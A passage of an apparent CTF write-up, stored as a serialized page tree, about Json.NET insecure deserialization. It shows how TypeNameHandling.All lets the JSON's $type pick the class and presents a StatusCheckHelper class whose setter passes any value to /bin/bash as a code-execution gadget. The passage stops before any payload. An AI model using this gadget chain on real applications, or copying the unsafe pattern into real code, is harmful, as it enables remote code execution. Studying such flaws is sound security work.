deserialization\n",{"type":32,"tag":89,"props":3572,"children":3573},{"class":91,"line":102},[3574,3578,3582,3586,3590,3594,3598,3602,3606,3610,3614],{"type":32,"tag":89,"props":3575,"children":3576},{"style":112},[3577],{"type":37,"value":3354},{"type":32,"tag":89,"props":3579,"children":3580},{"style":118},[3581],{"type":37,"value":3329},{"type":32,"tag":89,"props":3583,"children":3584},{"style":124},[3585],{"type":37,"value":156},{"type":32,"tag":89,"props":3587,"children":3588},{"style":159},[3589],{"type":37,"value":2336},{"type":32,"tag":89,"props":3591,"children":3592},{"style":124},[3593],{"type":37,"value":167},{"type":32,"tag":89,"props":3595,"children":3596},{"style":118},[3597],{"type":37,"value":2638},{"type":32,"tag":89,"props":3599,"children":3600},{"style":124},[3601],{"type":37,"value":853},{"type":32,"tag":89,"props":3603,"children":3604},{"style":112},[3605],{"type":37,"value":3354},{"type":32,"tag":89,"props":3607,"children":3608},{"style":124},[3609],{"type":37,"value":3359},{"type":32,"tag":89,"props":3611,"children":3612},{"style":159},[3613],{"type":37,"value":3313},{"type":32,"tag":89,"props":3615,"children":3616},{"style":124},[3617],{"type":37,"value":907},{"type":32,"tag":89,"props":3619,"children":3620},{"class":91,"line":130},[3621],{"type":32,"tag":89,"props":3622,"children":3623},{"emptyLinePlaceholder":275},[3624],{"type":37,"value":278},{"type":32,"tag":89,"props":3626,"children":3627},{"class":91,"line":139},[3628],{"type":32,"tag":89,"props":3629,"children":3630},{"style":96},[3631],{"type":37,"value":3632},"// Without safe 
deserialization\n",{"type":32,"tag":89,"props":3634,"children":3635},{"class":91,"line":211},[3636,3640,3644,3648,3652,3656,3660,3664,3668,3672,3676,3680,3684,3689],{"type":32,"tag":89,"props":3637,"children":3638},{"style":112},[3639],{"type":37,"value":3354},{"type":32,"tag":89,"props":3641,"children":3642},{"style":118},[3643],{"type":37,"value":3329},{"type":32,"tag":89,"props":3645,"children":3646},{"style":124},[3647],{"type":37,"value":156},{"type":32,"tag":89,"props":3649,"children":3650},{"style":159},[3651],{"type":37,"value":2336},{"type":32,"tag":89,"props":3653,"children":3654},{"style":124},[3655],{"type":37,"value":167},{"type":32,"tag":89,"props":3657,"children":3658},{"style":118},[3659],{"type":37,"value":2638},{"type":32,"tag":89,"props":3661,"children":3662},{"style":124},[3663],{"type":37,"value":853},{"type":32,"tag":89,"props":3665,"children":3666},{"style":112},[3667],{"type":37,"value":3354},{"type":32,"tag":89,"props":3669,"children":3670},{"style":124},[3671],{"type":37,"value":3359},{"type":32,"tag":89,"props":3673,"children":3674},{"style":159},[3675],{"type":37,"value":3313},{"type":32,"tag":89,"props":3677,"children":3678},{"style":124},[3679],{"type":37,"value":372},{"type":32,"tag":89,"props":3681,"children":3682},{"style":106},[3683],{"type":37,"value":1385},{"type":32,"tag":89,"props":3685,"children":3686},{"style":112},[3687],{"type":37,"value":3688}," 
JsonSerializerSettings",{"type":32,"tag":89,"props":3690,"children":3691},{"style":124},[3692],{"type":37,"value":2964},{"type":32,"tag":89,"props":3694,"children":3695},{"class":91,"line":271},[3696,3700,3704,3708,3712],{"type":32,"tag":89,"props":3697,"children":3698},{"style":159},[3699],{"type":37,"value":2382},{"type":32,"tag":89,"props":3701,"children":3702},{"style":124},[3703],{"type":37,"value":156},{"type":32,"tag":89,"props":3705,"children":3706},{"style":159},[3707],{"type":37,"value":2391},{"type":32,"tag":89,"props":3709,"children":3710},{"style":124},[3711],{"type":37,"value":167},{"type":32,"tag":89,"props":3713,"children":3714},{"style":159},[3715],{"type":37,"value":2400},{"type":32,"tag":89,"props":3717,"children":3718},{"class":91,"line":281},[3719],{"type":32,"tag":89,"props":3720,"children":3721},{"style":124},[3722],{"type":37,"value":3723},"});\n",{"type":32,"tag":46,"props":3725,"children":3726},{},[3727],{"type":37,"value":3728},"If we execute the previous code with the TypeNameHandling.All option, we can see that the deserialization is done without any problem, but the output is different.",{"type":32,"tag":74,"props":3730,"children":3731},{"lang":3519},[3732],{"type":32,"tag":79,"props":3733,"children":3735},{"code":3734},"Serialized Person:\n{\"$type\":\"Person, ExampleNameSpace\",\"Name\":\"John\",\"Age\":30}\n",[3736],{"type":32,"tag":85,"props":3737,"children":3738},{"__ignoreMap":7},[3739],{"type":37,"value":3734},{"type":32,"tag":46,"props":3741,"children":3742},{},[3743,3745,3751,3753,3758],{"type":37,"value":3744},"We can see now the json contains an attribute ",{"type":32,"tag":85,"props":3746,"children":3748},{"className":3747},[],[3749],{"type":37,"value":3750},"$type",{"type":37,"value":3752}," with the value of the class followed by its namespace. 
Then, the elements following ",{"type":32,"tag":85,"props":3754,"children":3756},{"className":3755},[],[3757],{"type":37,"value":3750},{"type":37,"value":3759}," are the attributes of the class (Name and Age).",{"type":32,"tag":46,"props":3761,"children":3762},{},[3763,3765],{"type":37,"value":3764},"The format of the JSON is different, ",{"type":32,"tag":2804,"props":3766,"children":3767},{},[3768],{"type":37,"value":3769},"but it is important to note that with this unsafe option the type to instantiate is read from the $type attribute of the JSON itself, so it is possible to deserialize instances of a class chosen by whoever controls the JSON.",{"type":32,"tag":46,"props":3771,"children":3772},{},[3773],{"type":37,"value":3774},"To recap, we are able to create a new instance of an object of our choice, and we can also set the values of the attributes of this object. This is why the Json.NET documentation says incoming types should be validated with a custom SerializationBinder whenever TypeNameHandling is set to anything other than None.",{"type":32,"tag":46,"props":3776,"children":3777},{},[3778,3780,3786],{"type":37,"value":3779},"If we take a closer look at the ",{"type":32,"tag":85,"props":3781,"children":3783},{"className":3782},[],[3784],{"type":37,"value":3785},"/status",{"type":37,"value":3787}," route, it uses a class that relies on system functions. 
This class could be interesting for us in our case because if we manage to deserialize an instance of this class, it will then be easy for us to execute arbitrary code.",{"type":32,"tag":74,"props":3789,"children":3790},{"lang":76},[3791],{"type":32,"tag":79,"props":3792,"children":3794},{"code":3793,"language":76,"meta":7,"className":82,"style":7},"[Route(\"/status\")]\n[HttpGet]\npublic IActionResult Status()\n{\n  StatusCheckHelper statusCheckHelper = new StatusCheckHelper();\n\n  statusCheckHelper.command = \"bash /tmp/cpu.sh\";\n  string cpuUsage = statusCheckHelper.output;\n\n  statusCheckHelper.command = \"bash /tmp/mem.sh\";\n  string memoryUsage = statusCheckHelper.output;\n\n  statusCheckHelper.command = \"bash /tmp/disk.sh\";\n  string diskUsage = statusCheckHelper.output;\n\n  return Content($\"CPU Usage: {cpuUsage}\\nMemory Usage: {memoryUsage}\\nDisk Space: {diskUsage}\");\n}\n",[3795],{"type":32,"tag":85,"props":3796,"children":3797},{"__ignoreMap":7},[3798,3831,3846,3866,3873,3903,3910,3948,3982,3989,4025,4057,4064,4100,4132,4139,4230],{"type":32,"tag":89,"props":3799,"children":3800},{"class":91,"line":92},[3801,3805,3810,3814,3818,3822,3826],{"type":32,"tag":89,"props":3802,"children":3803},{"style":124},[3804],{"type":37,"value":177},{"type":32,"tag":89,"props":3806,"children":3807},{"style":112},[3808],{"type":37,"value":3809},"Route",{"type":32,"tag":89,"props":3811,"children":3812},{"style":124},[3813],{"type":37,"value":357},{"type":32,"tag":89,"props":3815,"children":3816},{"style":180},[3817],{"type":37,"value":183},{"type":32,"tag":89,"props":3819,"children":3820},{"style":186},[3821],{"type":37,"value":3785},{"type":32,"tag":89,"props":3823,"children":3824},{"style":180},[3825],{"type":37,"value":183},{"type":32,"tag":89,"props":3827,"children":3828},{"style":124},[3829],{"type":37,"value":3830},")]\n",{"type":32,"tag":89,"props":3832,"children":3833},{"class":91,"line":102},[3834,3838,3842],{"type":32,"tag":89,"props":3835,"children":3836
},{"style":124},[3837],{"type":37,"value":177},{"type":32,"tag":89,"props":3839,"children":3840},{"style":112},[3841],{"type":37,"value":1733},{"type":32,"tag":89,"props":3843,"children":3844},{"style":124},[3845],{"type":37,"value":302},{"type":32,"tag":89,"props":3847,"children":3848},{"class":91,"line":130},[3849,3853,3857,3862],{"type":32,"tag":89,"props":3850,"children":3851},{"style":106},[3852],{"type":37,"value":109},{"type":32,"tag":89,"props":3854,"children":3855},{"style":112},[3856],{"type":37,"value":115},{"type":32,"tag":89,"props":3858,"children":3859},{"style":118},[3860],{"type":37,"value":3861}," Status",{"type":32,"tag":89,"props":3863,"children":3864},{"style":124},[3865],{"type":37,"value":127},{"type":32,"tag":89,"props":3867,"children":3868},{"class":91,"line":139},[3869],{"type":32,"tag":89,"props":3870,"children":3871},{"style":124},[3872],{"type":37,"value":136},{"type":32,"tag":89,"props":3874,"children":3875},{"class":91,"line":211},[3876,3881,3886,3890,3894,3899],{"type":32,"tag":89,"props":3877,"children":3878},{"style":112},[3879],{"type":37,"value":3880},"  StatusCheckHelper",{"type":32,"tag":89,"props":3882,"children":3883},{"style":118},[3884],{"type":37,"value":3885}," statusCheckHelper",{"type":32,"tag":89,"props":3887,"children":3888},{"style":124},[3889],{"type":37,"value":156},{"type":32,"tag":89,"props":3891,"children":3892},{"style":106},[3893],{"type":37,"value":1385},{"type":32,"tag":89,"props":3895,"children":3896},{"style":112},[3897],{"type":37,"value":3898}," 
StatusCheckHelper",{"type":32,"tag":89,"props":3900,"children":3901},{"style":124},[3902],{"type":37,"value":208},{"type":32,"tag":89,"props":3904,"children":3905},{"class":91,"line":271},[3906],{"type":32,"tag":89,"props":3907,"children":3908},{"emptyLinePlaceholder":275},[3909],{"type":37,"value":278},{"type":32,"tag":89,"props":3911,"children":3912},{"class":91,"line":281},[3913,3918,3922,3927,3931,3935,3940,3944],{"type":32,"tag":89,"props":3914,"children":3915},{"style":159},[3916],{"type":37,"value":3917},"  statusCheckHelper",{"type":32,"tag":89,"props":3919,"children":3920},{"style":124},[3921],{"type":37,"value":167},{"type":32,"tag":89,"props":3923,"children":3924},{"style":159},[3925],{"type":37,"value":3926},"command",{"type":32,"tag":89,"props":3928,"children":3929},{"style":124},[3930],{"type":37,"value":156},{"type":32,"tag":89,"props":3932,"children":3933},{"style":180},[3934],{"type":37,"value":3169},{"type":32,"tag":89,"props":3936,"children":3937},{"style":186},[3938],{"type":37,"value":3939},"bash /tmp/cpu.sh",{"type":32,"tag":89,"props":3941,"children":3942},{"style":180},[3943],{"type":37,"value":183},{"type":32,"tag":89,"props":3945,"children":3946},{"style":124},[3947],{"type":37,"value":1866},{"type":32,"tag":89,"props":3949,"children":3950},{"class":91,"line":305},[3951,3956,3961,3965,3969,3973,3978],{"type":32,"tag":89,"props":3952,"children":3953},{"style":143},[3954],{"type":37,"value":3955},"  string",{"type":32,"tag":89,"props":3957,"children":3958},{"style":118},[3959],{"type":37,"value":3960}," 
cpuUsage",{"type":32,"tag":89,"props":3962,"children":3963},{"style":124},[3964],{"type":37,"value":156},{"type":32,"tag":89,"props":3966,"children":3967},{"style":159},[3968],{"type":37,"value":3885},{"type":32,"tag":89,"props":3970,"children":3971},{"style":124},[3972],{"type":37,"value":167},{"type":32,"tag":89,"props":3974,"children":3975},{"style":159},[3976],{"type":37,"value":3977},"output",{"type":32,"tag":89,"props":3979,"children":3980},{"style":124},[3981],{"type":37,"value":1866},{"type":32,"tag":89,"props":3983,"children":3984},{"class":91,"line":314},[3985],{"type":32,"tag":89,"props":3986,"children":3987},{"emptyLinePlaceholder":275},[3988],{"type":37,"value":278},{"type":32,"tag":89,"props":3990,"children":3991},{"class":91,"line":331},[3992,3996,4000,4004,4008,4012,4017,4021],{"type":32,"tag":89,"props":3993,"children":3994},{"style":159},[3995],{"type":37,"value":3917},{"type":32,"tag":89,"props":3997,"children":3998},{"style":124},[3999],{"type":37,"value":167},{"type":32,"tag":89,"props":4001,"children":4002},{"style":159},[4003],{"type":37,"value":3926},{"type":32,"tag":89,"props":4005,"children":4006},{"style":124},[4007],{"type":37,"value":156},{"type":32,"tag":89,"props":4009,"children":4010},{"style":180},[4011],{"type":37,"value":3169},{"type":32,"tag":89,"props":4013,"children":4014},{"style":186},[4015],{"type":37,"value":4016},"bash /tmp/mem.sh",{"type":32,"tag":89,"props":4018,"children":4019},{"style":180},[4020],{"type":37,"value":183},{"type":32,"tag":89,"props":4022,"children":4023},{"style":124},[4024],{"type":37,"value":1866},{"type":32,"tag":89,"props":4026,"children":4027},{"class":91,"line":339},[4028,4032,4037,4041,4045,4049,4053],{"type":32,"tag":89,"props":4029,"children":4030},{"style":143},[4031],{"type":37,"value":3955},{"type":32,"tag":89,"props":4033,"children":4034},{"style":118},[4035],{"type":37,"value":4036}," 
memoryUsage",{"type":32,"tag":89,"props":4038,"children":4039},{"style":124},[4040],{"type":37,"value":156},{"type":32,"tag":89,"props":4042,"children":4043},{"style":159},[4044],{"type":37,"value":3885},{"type":32,"tag":89,"props":4046,"children":4047},{"style":124},[4048],{"type":37,"value":167},{"type":32,"tag":89,"props":4050,"children":4051},{"style":159},[4052],{"type":37,"value":3977},{"type":32,"tag":89,"props":4054,"children":4055},{"style":124},[4056],{"type":37,"value":1866},{"type":32,"tag":89,"props":4058,"children":4059},{"class":91,"line":390},[4060],{"type":32,"tag":89,"props":4061,"children":4062},{"emptyLinePlaceholder":275},[4063],{"type":37,"value":278},{"type":32,"tag":89,"props":4065,"children":4066},{"class":91,"line":398},[4067,4071,4075,4079,4083,4087,4092,4096],{"type":32,"tag":89,"props":4068,"children":4069},{"style":159},[4070],{"type":37,"value":3917},{"type":32,"tag":89,"props":4072,"children":4073},{"style":124},[4074],{"type":37,"value":167},{"type":32,"tag":89,"props":4076,"children":4077},{"style":159},[4078],{"type":37,"value":3926},{"type":32,"tag":89,"props":4080,"children":4081},{"style":124},[4082],{"type":37,"value":156},{"type":32,"tag":89,"props":4084,"children":4085},{"style":180},[4086],{"type":37,"value":3169},{"type":32,"tag":89,"props":4088,"children":4089},{"style":186},[4090],{"type":37,"value":4091},"bash /tmp/disk.sh",{"type":32,"tag":89,"props":4093,"children":4094},{"style":180},[4095],{"type":37,"value":183},{"type":32,"tag":89,"props":4097,"children":4098},{"style":124},[4099],{"type":37,"value":1866},{"type":32,"tag":89,"props":4101,"children":4102},{"class":91,"line":454},[4103,4107,4112,4116,4120,4124,4128],{"type":32,"tag":89,"props":4104,"children":4105},{"style":143},[4106],{"type":37,"value":3955},{"type":32,"tag":89,"props":4108,"children":4109},{"style":118},[4110],{"type":37,"value":4111}," 
diskUsage",{"type":32,"tag":89,"props":4113,"children":4114},{"style":124},[4115],{"type":37,"value":156},{"type":32,"tag":89,"props":4117,"children":4118},{"style":159},[4119],{"type":37,"value":3885},{"type":32,"tag":89,"props":4121,"children":4122},{"style":124},[4123],{"type":37,"value":167},{"type":32,"tag":89,"props":4125,"children":4126},{"style":159},[4127],{"type":37,"value":3977},{"type":32,"tag":89,"props":4129,"children":4130},{"style":124},[4131],{"type":37,"value":1866},{"type":32,"tag":89,"props":4133,"children":4134},{"class":91,"line":503},[4135],{"type":32,"tag":89,"props":4136,"children":4137},{"emptyLinePlaceholder":275},[4138],{"type":37,"value":278},{"type":32,"tag":89,"props":4140,"children":4141},{"class":91,"line":567},[4142,4147,4151,4155,4160,4165,4169,4174,4178,4182,4187,4191,4196,4200,4204,4209,4213,4218,4222,4226],{"type":32,"tag":89,"props":4143,"children":4144},{"style":143},[4145],{"type":37,"value":4146},"  return",{"type":32,"tag":89,"props":4148,"children":4149},{"style":118},[4150],{"type":37,"value":1047},{"type":32,"tag":89,"props":4152,"children":4153},{"style":124},[4154],{"type":37,"value":357},{"type":32,"tag":89,"props":4156,"children":4157},{"style":180},[4158],{"type":37,"value":4159},"$\"",{"type":32,"tag":89,"props":4161,"children":4162},{"style":186},[4163],{"type":37,"value":4164},"CPU Usage: ",{"type":32,"tag":89,"props":4166,"children":4167},{"style":124},[4168],{"type":37,"value":240},{"type":32,"tag":89,"props":4170,"children":4171},{"style":186},[4172],{"type":37,"value":4173},"cpuUsage",{"type":32,"tag":89,"props":4175,"children":4176},{"style":124},[4177],{"type":37,"value":249},{"type":32,"tag":89,"props":4179,"children":4180},{"style":3393},[4181],{"type":37,"value":3396},{"type":32,"tag":89,"props":4183,"children":4184},{"style":186},[4185],{"type":37,"value":4186},"Memory Usage: 
",{"type":32,"tag":89,"props":4188,"children":4189},{"style":124},[4190],{"type":37,"value":240},{"type":32,"tag":89,"props":4192,"children":4193},{"style":186},[4194],{"type":37,"value":4195},"memoryUsage",{"type":32,"tag":89,"props":4197,"children":4198},{"style":124},[4199],{"type":37,"value":249},{"type":32,"tag":89,"props":4201,"children":4202},{"style":3393},[4203],{"type":37,"value":3396},{"type":32,"tag":89,"props":4205,"children":4206},{"style":186},[4207],{"type":37,"value":4208},"Disk Space: ",{"type":32,"tag":89,"props":4210,"children":4211},{"style":124},[4212],{"type":37,"value":240},{"type":32,"tag":89,"props":4214,"children":4215},{"style":186},[4216],{"type":37,"value":4217},"diskUsage",{"type":32,"tag":89,"props":4219,"children":4220},{"style":124},[4221],{"type":37,"value":249},{"type":32,"tag":89,"props":4223,"children":4224},{"style":180},[4225],{"type":37,"value":183},{"type":32,"tag":89,"props":4227,"children":4228},{"style":124},[4229],{"type":37,"value":907},{"type":32,"tag":89,"props":4231,"children":4232},{"class":91,"line":640},[4233],{"type":32,"tag":89,"props":4234,"children":4235},{"style":124},[4236],{"type":37,"value":311},{"type":32,"tag":46,"props":4238,"children":4239},{},[4240,4242,4248],{"type":37,"value":4241},"And the ",{"type":32,"tag":85,"props":4243,"children":4245},{"className":4244},[],[4246],{"type":37,"value":4247},"StatusCheckHelper",{"type":37,"value":4249}," class is as follows:",{"type":32,"tag":74,"props":4251,"children":4252},{"lang":76},[4253],{"type":32,"tag":79,"props":4254,"children":4256},{"code":4255,"language":76,"meta":7,"className":82,"style":7},"using System.Diagnostics;\n\nnamespace Nexus_Void.Helpers\n{\n    public class StatusCheckHelper\n    {\n        public string output { get; set; }\n        private string _command;\n        public string command \n        {\n            get { return _command; }\n\n            set\n            {\n                _command = value;\n                try\n           
     {\n                    var p = new System.Diagnostics.Process();\n\n                    var processStartInfo = new ProcessStartInfo()\n                    {\n                        WindowStyle = ProcessWindowStyle.Hidden,\n                        FileName = $\"/bin/bash\",\n                        WorkingDirectory = \"/tmp\",\n                        Arguments = $\"-c \\\"{_command}\\\"\",\n                        RedirectStandardOutput = true,\n                        RedirectStandardError = true,\n                        UseShellExecute = false\n                    };\n                    p.StartInfo = processStartInfo;\n                    p.Start();\n                    output = p.StandardOutput.ReadToEnd();\n                }\n                [...]\n            }\n        }\n\n\n    }\n}\n",[4257],{"type":32,"tag":85,"props":4258,"children":4259},{"__ignoreMap":7},[4260,4284,4291,4310,4317,4333,4340,4380,4401,4421,4428,4457,4464,4472,4479,4500,4508,4516,4562,4569,4598,4606,4637,4666,4695,4746,4767,4787,4804,4812,4841,4861,4899,4907,4927,4934,4941,4948,4955,4962],{"type":32,"tag":89,"props":4261,"children":4262},{"class":91,"line":92},[4263,4267,4271,4275,4280],{"type":32,"tag":89,"props":4264,"children":4265},{"style":143},[4266],{"type":37,"value":2153},{"type":32,"tag":89,"props":4268,"children":4269},{"style":112},[4270],{"type":37,"value":2877},{"type":32,"tag":89,"props":4272,"children":4273},{"style":124},[4274],{"type":37,"value":167},{"type":32,"tag":89,"props":4276,"children":4277},{"style":112},[4278],{"type":37,"value":4279},"Diagnostics",{"type":32,"tag":89,"props":4281,"children":4282},{"style":124},[4283],{"type":37,"value":1866},{"type":32,"tag":89,"props":4285,"children":4286},{"class":91,"line":102},[4287],{"type":32,"tag":89,"props":4288,"children":4289},{"emptyLinePlaceholder":275},[4290],{"type":37,"value":278},{"type":32,"tag":89,"props":4292,"children":4293},{"class":91,"line":130},[4294,4298,4302,4306],{"type":32,"tag":89,"props":42
95,"children":4296},{"style":106},[4297],{"type":37,"value":2211},{"type":32,"tag":89,"props":4299,"children":4300},{"style":112},[4301],{"type":37,"value":2183},{"type":32,"tag":89,"props":4303,"children":4304},{"style":124},[4305],{"type":37,"value":167},{"type":32,"tag":89,"props":4307,"children":4308},{"style":112},[4309],{"type":37,"value":2224},{"type":32,"tag":89,"props":4311,"children":4312},{"class":91,"line":139},[4313],{"type":32,"tag":89,"props":4314,"children":4315},{"style":124},[4316],{"type":37,"value":136},{"type":32,"tag":89,"props":4318,"children":4319},{"class":91,"line":211},[4320,4324,4328],{"type":32,"tag":89,"props":4321,"children":4322},{"style":106},[4323],{"type":37,"value":2239},{"type":32,"tag":89,"props":4325,"children":4326},{"style":106},[4327],{"type":37,"value":2244},{"type":32,"tag":89,"props":4329,"children":4330},{"style":112},[4331],{"type":37,"value":4332}," StatusCheckHelper\n",{"type":32,"tag":89,"props":4334,"children":4335},{"class":91,"line":271},[4336],{"type":32,"tag":89,"props":4337,"children":4338},{"style":124},[4339],{"type":37,"value":758},{"type":32,"tag":89,"props":4341,"children":4342},{"class":91,"line":281},[4343,4347,4351,4356,4360,4364,4368,4372,4376],{"type":32,"tag":89,"props":4344,"children":4345},{"style":106},[4346],{"type":37,"value":2264},{"type":32,"tag":89,"props":4348,"children":4349},{"style":143},[4350],{"type":37,"value":377},{"type":32,"tag":89,"props":4352,"children":4353},{"style":118},[4354],{"type":37,"value":4355}," 
output",{"type":32,"tag":89,"props":4357,"children":4358},{"style":124},[4359],{"type":37,"value":2986},{"type":32,"tag":89,"props":4361,"children":4362},{"style":106},[4363],{"type":37,"value":2991},{"type":32,"tag":89,"props":4365,"children":4366},{"style":124},[4367],{"type":37,"value":263},{"type":32,"tag":89,"props":4369,"children":4370},{"style":106},[4371],{"type":37,"value":3000},{"type":32,"tag":89,"props":4373,"children":4374},{"style":124},[4375],{"type":37,"value":263},{"type":32,"tag":89,"props":4377,"children":4378},{"style":124},[4379],{"type":37,"value":3009},{"type":32,"tag":89,"props":4381,"children":4382},{"class":91,"line":305},[4383,4388,4392,4397],{"type":32,"tag":89,"props":4384,"children":4385},{"style":106},[4386],{"type":37,"value":4387},"        private",{"type":32,"tag":89,"props":4389,"children":4390},{"style":143},[4391],{"type":37,"value":377},{"type":32,"tag":89,"props":4393,"children":4394},{"style":118},[4395],{"type":37,"value":4396}," _command",{"type":32,"tag":89,"props":4398,"children":4399},{"style":124},[4400],{"type":37,"value":1866},{"type":32,"tag":89,"props":4402,"children":4403},{"class":91,"line":314},[4404,4408,4412,4417],{"type":32,"tag":89,"props":4405,"children":4406},{"style":106},[4407],{"type":37,"value":2264},{"type":32,"tag":89,"props":4409,"children":4410},{"style":143},[4411],{"type":37,"value":377},{"type":32,"tag":89,"props":4413,"children":4414},{"style":118},[4415],{"type":37,"value":4416}," command",{"type":32,"tag":89,"props":4418,"children":4419},{"style":295},[4420],{"type":37,"value":2543},{"type":32,"tag":89,"props":4422,"children":4423},{"class":91,"line":331},[4424],{"type":32,"tag":89,"props":4425,"children":4426},{"style":124},[4427],{"type":37,"value":839},{"type":32,"tag":89,"props":4429,"children":4430},{"class":91,"line":339},[4431,4436,4440,4445,4449,4453],{"type":32,"tag":89,"props":4432,"children":4433},{"style":106},[4434],{"type":37,"value":4435},"            
get",{"type":32,"tag":89,"props":4437,"children":4438},{"style":124},[4439],{"type":37,"value":2986},{"type":32,"tag":89,"props":4441,"children":4442},{"style":143},[4443],{"type":37,"value":4444}," return",{"type":32,"tag":89,"props":4446,"children":4447},{"style":159},[4448],{"type":37,"value":4396},{"type":32,"tag":89,"props":4450,"children":4451},{"style":124},[4452],{"type":37,"value":263},{"type":32,"tag":89,"props":4454,"children":4455},{"style":124},[4456],{"type":37,"value":3009},{"type":32,"tag":89,"props":4458,"children":4459},{"class":91,"line":390},[4460],{"type":32,"tag":89,"props":4461,"children":4462},{"emptyLinePlaceholder":275},[4463],{"type":37,"value":278},{"type":32,"tag":89,"props":4465,"children":4466},{"class":91,"line":398},[4467],{"type":32,"tag":89,"props":4468,"children":4469},{"style":106},[4470],{"type":37,"value":4471},"            set\n",{"type":32,"tag":89,"props":4473,"children":4474},{"class":91,"line":454},[4475],{"type":32,"tag":89,"props":4476,"children":4477},{"style":124},[4478],{"type":37,"value":1033},{"type":32,"tag":89,"props":4480,"children":4481},{"class":91,"line":503},[4482,4487,4491,4496],{"type":32,"tag":89,"props":4483,"children":4484},{"style":159},[4485],{"type":37,"value":4486},"                _command",{"type":32,"tag":89,"props":4488,"children":4489},{"style":124},[4490],{"type":37,"value":156},{"type":32,"tag":89,"props":4492,"children":4493},{"style":159},[4494],{"type":37,"value":4495}," value",{"type":32,"tag":89,"props":4497,"children":4498},{"style":124},[4499],{"type":37,"value":1866},{"type":32,"tag":89,"props":4501,"children":4502},{"class":91,"line":567},[4503],{"type":32,"tag":89,"props":4504,"children":4505},{"style":143},[4506],{"type":37,"value":4507},"                try\n",{"type":32,"tag":89,"props":4509,"children":4510},{"class":91,"line":640},[4511],{"type":32,"tag":89,"props":4512,"children":4513},{"style":124},[4514],{"type":37,"value":4515},"                
{\n",{"type":32,"tag":89,"props":4517,"children":4518},{"class":91,"line":699},[4519,4524,4529,4533,4537,4541,4545,4549,4553,4558],{"type":32,"tag":89,"props":4520,"children":4521},{"style":106},[4522],{"type":37,"value":4523},"                    var",{"type":32,"tag":89,"props":4525,"children":4526},{"style":118},[4527],{"type":37,"value":4528}," p",{"type":32,"tag":89,"props":4530,"children":4531},{"style":124},[4532],{"type":37,"value":156},{"type":32,"tag":89,"props":4534,"children":4535},{"style":106},[4536],{"type":37,"value":1385},{"type":32,"tag":89,"props":4538,"children":4539},{"style":112},[4540],{"type":37,"value":2877},{"type":32,"tag":89,"props":4542,"children":4543},{"style":124},[4544],{"type":37,"value":167},{"type":32,"tag":89,"props":4546,"children":4547},{"style":112},[4548],{"type":37,"value":4279},{"type":32,"tag":89,"props":4550,"children":4551},{"style":124},[4552],{"type":37,"value":167},{"type":32,"tag":89,"props":4554,"children":4555},{"style":112},[4556],{"type":37,"value":4557},"Process",{"type":32,"tag":89,"props":4559,"children":4560},{"style":124},[4561],{"type":37,"value":208},{"type":32,"tag":89,"props":4563,"children":4564},{"class":91,"line":752},[4565],{"type":32,"tag":89,"props":4566,"children":4567},{"emptyLinePlaceholder":275},[4568],{"type":37,"value":278},{"type":32,"tag":89,"props":4570,"children":4571},{"class":91,"line":761},[4572,4576,4581,4585,4589,4594],{"type":32,"tag":89,"props":4573,"children":4574},{"style":106},[4575],{"type":37,"value":4523},{"type":32,"tag":89,"props":4577,"children":4578},{"style":118},[4579],{"type":37,"value":4580}," processStartInfo",{"type":32,"tag":89,"props":4582,"children":4583},{"style":124},[4584],{"type":37,"value":156},{"type":32,"tag":89,"props":4586,"children":4587},{"style":106},[4588],{"type":37,"value":1385},{"type":32,"tag":89,"props":4590,"children":4591},{"style":112},[4592],{"type":37,"value":4593}," 
ProcessStartInfo",{"type":32,"tag":89,"props":4595,"children":4596},{"style":124},[4597],{"type":37,"value":127},{"type":32,"tag":89,"props":4599,"children":4600},{"class":91,"line":833},[4601],{"type":32,"tag":89,"props":4602,"children":4603},{"style":124},[4604],{"type":37,"value":4605},"                    {\n",{"type":32,"tag":89,"props":4607,"children":4608},{"class":91,"line":842},[4609,4614,4618,4623,4627,4632],{"type":32,"tag":89,"props":4610,"children":4611},{"style":159},[4612],{"type":37,"value":4613},"                        WindowStyle",{"type":32,"tag":89,"props":4615,"children":4616},{"style":124},[4617],{"type":37,"value":156},{"type":32,"tag":89,"props":4619,"children":4620},{"style":159},[4621],{"type":37,"value":4622}," ProcessWindowStyle",{"type":32,"tag":89,"props":4624,"children":4625},{"style":124},[4626],{"type":37,"value":167},{"type":32,"tag":89,"props":4628,"children":4629},{"style":159},[4630],{"type":37,"value":4631},"Hidden",{"type":32,"tag":89,"props":4633,"children":4634},{"style":124},[4635],{"type":37,"value":4636},",\n",{"type":32,"tag":89,"props":4638,"children":4639},{"class":91,"line":910},[4640,4645,4649,4653,4658,4662],{"type":32,"tag":89,"props":4641,"children":4642},{"style":159},[4643],{"type":37,"value":4644},"                        
FileName",{"type":32,"tag":89,"props":4646,"children":4647},{"style":124},[4648],{"type":37,"value":156},{"type":32,"tag":89,"props":4650,"children":4651},{"style":180},[4652],{"type":37,"value":230},{"type":32,"tag":89,"props":4654,"children":4655},{"style":186},[4656],{"type":37,"value":4657},"/bin/bash",{"type":32,"tag":89,"props":4659,"children":4660},{"style":180},[4661],{"type":37,"value":183},{"type":32,"tag":89,"props":4663,"children":4664},{"style":124},[4665],{"type":37,"value":4636},{"type":32,"tag":89,"props":4667,"children":4668},{"class":91,"line":989},[4669,4674,4678,4682,4687,4691],{"type":32,"tag":89,"props":4670,"children":4671},{"style":159},[4672],{"type":37,"value":4673},"                        WorkingDirectory",{"type":32,"tag":89,"props":4675,"children":4676},{"style":124},[4677],{"type":37,"value":156},{"type":32,"tag":89,"props":4679,"children":4680},{"style":180},[4681],{"type":37,"value":3169},{"type":32,"tag":89,"props":4683,"children":4684},{"style":186},[4685],{"type":37,"value":4686},"/tmp",{"type":32,"tag":89,"props":4688,"children":4689},{"style":180},[4690],{"type":37,"value":183},{"type":32,"tag":89,"props":4692,"children":4693},{"style":124},[4694],{"type":37,"value":4636},{"type":32,"tag":89,"props":4696,"children":4697},{"class":91,"line":997},[4698,4703,4707,4711,4716,4721,4725,4730,4734,4738,4742],{"type":32,"tag":89,"props":4699,"children":4700},{"style":159},[4701],{"type":37,"value":4702},"                        Arguments",{"type":32,"tag":89,"props":4704,"children":4705},{"style":124},[4706],{"type":37,"value":156},{"type":32,"tag":89,"props":4708,"children":4709},{"style":180},[4710],{"type":37,"value":230},{"type":32,"tag":89,"props":4712,"children":4713},{"style":186},[4714],{"type":37,"value":4715},"-c 
